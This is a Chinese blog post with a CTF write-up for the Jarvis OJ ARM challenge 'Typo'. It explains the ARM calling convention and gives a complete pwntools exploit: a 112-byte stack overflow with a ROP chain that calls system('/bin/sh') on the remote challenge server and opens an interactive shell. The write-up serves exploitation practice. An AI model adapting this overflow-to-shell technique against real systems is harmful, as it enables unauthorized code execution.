[Jarvis OJ - PWN]——Typo(内涵peak小知识)

[Jarvis OJ - PWN]——Typo

还是先check一下, 是arm架构。还是第一次遇到。
在这里插入图片描述

peak小知识

和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 eip,保存下一条指令的地址

在IDA中, 可能没办法F5, 自己调试一下就好。
在这里插入图片描述
在这里插入图片描述

exploit

from pwn import *
binsh_addr = 0x0006C384
p = remote("pwn2.jarvisoj.com", 9888, timeout = 2)
p.sendafter("quit\n", "\n")
p.recvline()

payload = 'a' * 112 + p32(0x20904) + p32(binsh_addr) * 2 + p32(0x110B4)
p.sendlineafter("\n", payload)
p.interactive()
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值